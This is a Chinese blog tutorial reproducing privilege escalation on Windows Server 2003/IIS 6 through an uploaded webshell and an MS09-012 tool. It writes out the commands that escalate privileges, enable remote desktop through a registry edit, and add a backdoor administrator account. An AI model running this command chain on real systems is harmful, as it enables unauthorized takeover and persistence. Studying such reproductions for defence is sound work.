Windows2003系统漏洞提权复现

本文阅读 2 分钟
首页 安全分享,WEB安全 正文

操作系统: Microsoft Windows Server 2003

Web服务器: IIS V6.0

第一步,将大马文件上传至服务器根目录

img

第二步,访问大马文件,进入大马的控制界面

img

 img

img

第三步,查看漏洞补丁信息

img

 img

第四步,上传漏洞工具

将提权工具( 此处使用MS09-012漏洞工具 )上传到系统中,windows系统的回收站c:windowsTemp目录默认具有上传和执行的权限

img

第五步,利用工具进行提权

payload

/c c:\windows\temp\pr.exe "whoami"

img

第六步,开启远程桌面端口

命令行查看是否开启3389( 远程桌面 )端口

/c c:\windows\temp\pr.exe "netstat -ano"

 img

 img

上传a.bat文件至c:windowstemp目录下,内容为开启3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

img

 执行a.bat文件,开启3389端口

/c c:\windows\temp\pr.exe "c:\windows\temp\a.bat"

img

 查看3389是否开启成功

/c c:\windows\temp\pr.exe "netstat -ano"

img

 img

第七步,添加管理员权限用户

添加普通用户tom

/c c:\windows\temp\pr.exe "net user tom 123456 /add"

img

 将tom添加至administrators,拥有管理员权限

/c c:\windows\temp\pr.exe "net localgroup administrators tom /add"

img

第八步,物理机连接远程桌面

img

 img

 img

img

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/wangyuxiang946/article/details/118971557
-- 展开阅读全文 --
Redis底层数据结构--跳跃表
« 上一篇 04-28
BUUCTF Web [强网杯 2019]随便注
下一篇 » 06-24

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复